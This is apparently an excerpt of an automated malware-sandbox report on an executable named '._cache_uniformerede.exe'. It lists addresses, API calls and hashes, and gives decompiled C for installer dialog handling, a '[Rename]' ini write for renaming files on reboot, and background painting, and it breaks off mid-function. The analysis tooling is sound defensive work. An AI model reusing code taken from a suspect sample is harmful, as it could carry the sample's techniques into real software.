                                                                                                                                                                                                                            0x00405394
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040536e
                                                                                                                                                                                                                            0x004052fb
                                                                                                                                                                                                                            0x00405306
                                                                                                                                                                                                                            0x0040530b
                                                                                                                                                                                                                            0x00405312
                                                                                                                                                                                                                            0x00405317
                                                                                                                                                                                                                            0x0040531b
                                                                                                                                                                                                                            0x00405326
                                                                                                                                                                                                                            0x00405326
                                                                                                                                                                                                                            0x0040532a
                                                                                                                                                                                                                            0x0040532e
                                                                                                                                                                                                                            0x00405332
                                                                                                                                                                                                                            0x00405345
                                                                                                                                                                                                                            0x00405334
                                                                                                                                                                                                                            0x00405334
                                                                                                                                                                                                                            0x0040533b
                                                                                                                                                                                                                            0x00405341
                                                                                                                                                                                                                            0x0040533d
                                                                                                                                                                                                                            0x0040533d
                                                                                                                                                                                                                            0x0040533d
                                                                                                                                                                                                                            0x0040533b
                                                                                                                                                                                                                            0x00405349
                                                                                                                                                                                                                            0x0040534b
                                                                                                                                                                                                                            0x0040535e
                                                                                                                                                                                                                            0x00405361
                                                                                                                                                                                                                            0x00405364
                                                                                                                                                                                                                            0x00405364
                                                                                                                                                                                                                            0x0040532e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040531b
                                                                                                                                                                                                                            0x004052fd
                                                                                                                                                                                                                            0x00405304
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004053be
                                                                                                                                                                                                                            0x004053be
                                                                                                                                                                                                                            0x004053c5
                                                                                                                                                                                                                            0x00405436
                                                                                                                                                                                                                            0x0040543e
                                                                                                                                                                                                                            0x00405446
                                                                                                                                                                                                                            0x00405446
                                                                                                                                                                                                                            0x0040544f
                                                                                                                                                                                                                            0x00405451
                                                                                                                                                                                                                            0x00405458
                                                                                                                                                                                                                            0x0040545b
                                                                                                                                                                                                                            0x0040545b
                                                                                                                                                                                                                            0x00405461
                                                                                                                                                                                                                            0x00405468
                                                                                                                                                                                                                            0x0040546b
                                                                                                                                                                                                                            0x0040546b
                                                                                                                                                                                                                            0x00405471
                                                                                                                                                                                                                            0x00405477
                                                                                                                                                                                                                            0x0040547d
                                                                                                                                                                                                                            0x0040547d
                                                                                                                                                                                                                            0x0040548a
                                                                                                                                                                                                                            0x004055eb
                                                                                                                                                                                                                            0x004055f2
                                                                                                                                                                                                                            0x0040560f
                                                                                                                                                                                                                            0x00405615
                                                                                                                                                                                                                            0x00405627
                                                                                                                                                                                                                            0x00405627
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00405490
                                                                                                                                                                                                                            0x00405492
                                                                                                                                                                                                                            0x00405497
                                                                                                                                                                                                                            0x0040549c
                                                                                                                                                                                                                            0x004054a1
                                                                                                                                                                                                                            0x004054a3
                                                                                                                                                                                                                            0x004054a3
                                                                                                                                                                                                                            0x004054a4
                                                                                                                                                                                                                            0x004054a5
                                                                                                                                                                                                                            0x004054a7
                                                                                                                                                                                                                            0x004054a7
                                                                                                                                                                                                                            0x004054af
                                                                                                                                                                                                                            0x004054f0
                                                                                                                                                                                                                            0x004054f2
                                                                                                                                                                                                                            0x00405502
                                                                                                                                                                                                                            0x00405505
                                                                                                                                                                                                                            0x0040550a
                                                                                                                                                                                                                            0x00405511
                                                                                                                                                                                                                            0x00405514
                                                                                                                                                                                                                            0x004055b6
                                                                                                                                                                                                                            0x004055bf
                                                                                                                                                                                                                            0x004055c7
                                                                                                                                                                                                                            0x004055c7
                                                                                                                                                                                                                            0x004055d5
                                                                                                                                                                                                                            0x004055e6
                                                                                                                                                                                                                            0x004055e6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004055d5
                                                                                                                                                                                                                            0x0040551a
                                                                                                                                                                                                                            0x0040551d
                                                                                                                                                                                                                            0x00405523
                                                                                                                                                                                                                            0x00405528
                                                                                                                                                                                                                            0x0040552a
                                                                                                                                                                                                                            0x0040552c
                                                                                                                                                                                                                            0x00405532
                                                                                                                                                                                                                            0x00405539
                                                                                                                                                                                                                            0x0040553e
                                                                                                                                                                                                                            0x00405545
                                                                                                                                                                                                                            0x00405548
                                                                                                                                                                                                                            0x00405548
                                                                                                                                                                                                                            0x0040554f
                                                                                                                                                                                                                            0x0040555b
                                                                                                                                                                                                                            0x0040555f
                                                                                                                                                                                                                            0x00405561
                                                                                                                                                                                                                            0x00405561
                                                                                                                                                                                                                            0x00405551
                                                                                                                                                                                                                            0x00405553
                                                                                                                                                                                                                            0x00405553

APIs
• GetDlgItem.USER32 ref: 00405049
• GetDlgItem.USER32 ref: 00405054
• GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
• LoadImageW.USER32 ref: 004050B5
• SetWindowLongW.USER32 ref: 004050CE
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
• ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
• SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
• SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
• SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
• DeleteObject.GDI32(00000000), ref: 0040512B
• SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                                                                                                                                              • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                                                                                                                                                            • SetWindowLongW.USER32 ref: 0040527D
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 0040546B
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00405620
                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405627
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                            • String ID: $M$N
                                                                                                                                                                                                                            • API String ID: 2564846305-813528018
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                            			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                            				struct HWND__* _t56;
                                                                                                                                                                                                                            				intOrPtr _t69;
                                                                                                                                                                                                                            				signed int _t75;
                                                                                                                                                                                                                            				signed short* _t76;
                                                                                                                                                                                                                            				signed short* _t78;
                                                                                                                                                                                                                            				long _t92;
                                                                                                                                                                                                                            				int _t103;
                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                            				intOrPtr _t113;
                                                                                                                                                                                                                            				WCHAR* _t114;
                                                                                                                                                                                                                            				signed int* _t116;
                                                                                                                                                                                                                            				WCHAR* _t117;
                                                                                                                                                                                                                            				struct HWND__* _t118;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if(_a8 != 0x110) {
                                                                                                                                                                                                                            					if(_a8 != 0x111) {
                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                            						if(_a8 != 0x4e) {
                                                                                                                                                                                                                            							if(_a8 == 0x40b) {
                                                                                                                                                                                                                            								 *0x421714 =  *0x421714 + 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							L27:
                                                                                                                                                                                                                            							_t114 = _a16;
                                                                                                                                                                                                                            							L28:
                                                                                                                                                                                                                            							return E0040462B(_a8, _a12, _t114);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                                                                            						_t114 = _a16;
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                                                                                                                                                            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                                                                                                                                                            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                                                                                                                                                            							_v12 = _t103;
                                                                                                                                                                                                                            							_v16 = _t113;
                                                                                                                                                                                                                            							_v8 = 0x428200;
                                                                                                                                                                                                                            							if(_t103 - _t113 < 0x800) {
                                                                                                                                                                                                                            								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                                                                                                                                                            								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                                                                                                                                                            								_push(1);
                                                                                                                                                                                                                            								E00404A32(_a4, _v8);
                                                                                                                                                                                                                            								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                                                                                                                                                            								_t114 = _a16;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                                                                                                                                                            							goto L28;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                                                                                                                                                            								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                                                                                                                                                            								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							return 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                                                                                                                                                                                            						goto L27;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t69 =  *0x422720; // 0x68b77c
                                                                                                                                                                                                                            						_t29 = _t69 + 0x14; // 0x68b790
                                                                                                                                                                                                                            						_t116 = _t29;
                                                                                                                                                                                                                            						if(( *_t116 & 0x00000020) == 0) {
                                                                                                                                                                                                                            							goto L27;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                                                                                                                            						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                                                                                                                            						E00404A0E();
                                                                                                                                                                                                                            						goto L13;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t117 = _a16;
                                                                                                                                                                                                                            				_t75 =  *(_t117 + 0x30);
                                                                                                                                                                                                                            				if(_t75 < 0) {
                                                                                                                                                                                                                            					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t76 =  *0x42a298 + _t75 * 2;
                                                                                                                                                                                                                            				_t110 =  *_t76 & 0x0000ffff;
                                                                                                                                                                                                                            				_a8 = _t110;
                                                                                                                                                                                                                            				_t78 =  &(_t76[1]);
                                                                                                                                                                                                                            				_a16 = _t78;
                                                                                                                                                                                                                            				_v16 = _t78;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_v8 = E00404734;
                                                                                                                                                                                                                            				if(_t110 != 2) {
                                                                                                                                                                                                                            					_v8 = E004046FA;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                                                                                                                                                            				_push(0x22);
                                                                                                                                                                                                                            				E004045C4(_a4);
                                                                                                                                                                                                                            				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                                                                                                                                                            				_push(0x23);
                                                                                                                                                                                                                            				E004045C4(_a4);
                                                                                                                                                                                                                            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                                                                                                                            				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                                                                                                                                                            				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                                                                            				E004045F9(_t118);
                                                                                                                                                                                                                            				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                                                                                                                                                            				_t92 =  *( *0x42a270 + 0x68);
                                                                                                                                                                                                                            				if(_t92 < 0) {
                                                                                                                                                                                                                            					_t92 = GetSysColor( ~_t92);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                                                                                                                                                            				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                                                                                                                                                            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                                                                                                                                                            				 *0x421714 = 0;
                                                                                                                                                                                                                            				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                                                                                                                                                            				 *0x421714 = 0;
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404835
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00404863
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 004048FF
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000), ref: 00404906
                                                                                                                                                                                                                            • GetDlgItem.USER32 ref: 00404931
                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 00404985
                                                                                                                                                                                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                                                                                                                                                            • SetCursor.USER32(00000000), ref: 004049A1
                                                                                                                                                                                                                            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                            • String ID: Call$N
                                                                                                                                                                                                                            • API String ID: 3103080414-3438112850
                                                                                                                                                                                                                            • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                                                                                                                            • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004062AE(void* __ecx) {
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                            				long _t12;
                                                                                                                                                                                                                            				long _t24;
                                                                                                                                                                                                                            				char* _t31;
                                                                                                                                                                                                                            				int _t37;
                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                            				long _t42;
                                                                                                                                                                                                                            				WCHAR* _t44;
                                                                                                                                                                                                                            				void* _t46;
                                                                                                                                                                                                                            				void* _t48;
                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t38 = __ecx;
                                                                                                                                                                                                                            				_t44 =  *(_t52 + 0x14);
                                                                                                                                                                                                                            				 *0x426de8 = 0x55004e;
                                                                                                                                                                                                                            				 *0x426dec = 0x4c;
                                                                                                                                                                                                                            				if(_t44 == 0) {
                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                            					_t2 = _t52 + 0x1c; // 0x4275e8
                                                                                                                                                                                                                            					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                                                                                                                                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                                                                            						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                                                                                                                                                                                            						_t53 = _t52 + 0x10;
                                                                                                                                                                                                                            						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                                                                                                                                                                                            						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                                                                                                                                                                                            						_t48 = _t12;
                                                                                                                                                                                                                            						 *(_t53 + 0x18) = _t48;
                                                                                                                                                                                                                            						if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                            							_t42 = GetFileSize(_t48, 0);
                                                                                                                                                                                                                            							_t6 = _t37 + 0xa; // 0xa
                                                                                                                                                                                                                            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                                                                                                                                                                                            							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                                                                                                                                                                                            								L18:
                                                                                                                                                                                                                            								return CloseHandle(_t48);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                                                                                                                                                                                            									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                                                                                                                                                                                            									if(_t49 == 0) {
                                                                                                                                                                                                                            										_t48 =  *(_t53 + 0x18);
                                                                                                                                                                                                                            										L16:
                                                                                                                                                                                                                            										_t24 = _t42;
                                                                                                                                                                                                                            										L17:
                                                                                                                                                                                                                            										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                                                                                                                                                                                            										SetFilePointer(_t48, 0, 0, 0);
                                                                                                                                                                                                                            										E0040620A(_t48, _t46, _t42 + _t37);
                                                                                                                                                                                                                            										GlobalFree(_t46);
                                                                                                                                                                                                                            										goto L18;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t39 = _t46 + _t42;
                                                                                                                                                                                                                            									_t31 = _t39 + _t37;
                                                                                                                                                                                                                            									while(_t39 > _t49) {
                                                                                                                                                                                                                            										 *_t31 =  *_t39;
                                                                                                                                                                                                                            										_t31 = _t31 - 1;
                                                                                                                                                                                                                            										_t39 = _t39 - 1;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									_t24 = _t49 - _t46 + 1;
                                                                                                                                                                                                                            									_t48 =  *(_t53 + 0x18);
                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                                                                                                                                                                                            								_t42 = _t42 + 0xa;
                                                                                                                                                                                                                            								goto L16;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					CloseHandle(E00406158(_t44, 0, 1));
                                                                                                                                                                                                                            					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                                                                                                                                                                                            					if(_t12 != 0 && _t12 <= 0x400) {
                                                                                                                                                                                                                            						goto L3;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t12;
                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                                                                                                                                                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                                                                                                                                              • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                                                                                                                                                            • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 0040632D
                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                                                                                                                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                                                                                                                                                            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00406416
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                                                                                                                                                              • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\._cache_uniformerede.exe,80000000,00000003), ref: 0040615C
                                                                                                                                                                                                                              • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                            • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                                                                                                                                                            • API String ID: 2171350718-2295842750
                                                                                                                                                                                                                            • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                                                                                                                                                            • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 90%
                                                                                                                                                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                                                                                                                                                                                            				struct tagLOGBRUSH _v16;
                                                                                                                                                                                                                            				struct tagRECT _v32;
                                                                                                                                                                                                                            				struct tagPAINTSTRUCT _v96;
                                                                                                                                                                                                                            				struct HDC__* _t70;
                                                                                                                                                                                                                            				struct HBRUSH__* _t87;
                                                                                                                                                                                                                            				struct HFONT__* _t94;
                                                                                                                                                                                                                            				long _t102;
                                                                                                                                                                                                                            				signed int _t126;
                                                                                                                                                                                                                            				struct HDC__* _t128;
                                                                                                                                                                                                                            				intOrPtr _t130;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				if(_a8 == 0xf) {
                                                                                                                                                                                                                            					_t130 =  *0x42a270;
                                                                                                                                                                                                                            					_t70 = BeginPaint(_a4,  &_v96);
                                                                                                                                                                                                                            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                                                                                                                                                                                            					_a8 = _t70;
                                                                                                                                                                                                                            					GetClientRect(_a4,  &_v32);
                                                                                                                                                                                                                            					_t126 = _v32.bottom;
                                                                                                                                                                                                                            					_v32.bottom = _v32.bottom & 0x00000000;
                                                                                                                                                                                                                            					while(_v32.top < _t126) {
                                                                                                                                                                                                                            						_a12 = _t126 - _v32.top;
                                                                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                                                                            						asm("cdq");
                                                                                                                                                                                                                            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                                                                                                                                                                                            						_t87 = CreateBrushIndirect( &_v16);
                                                                                                                                                                                                                            						_v32.bottom = _v32.bottom + 4;
                                                                                                                                                                                                                            						_a16 = _t87;
                                                                                                                                                                                                                            						FillRect(_a8,  &_v32, _t87);
                                                                                                                                                                                                                            						DeleteObject(_a16);
                                                                                                                                                                                                                            						_v32.top = _v32.top + 4;
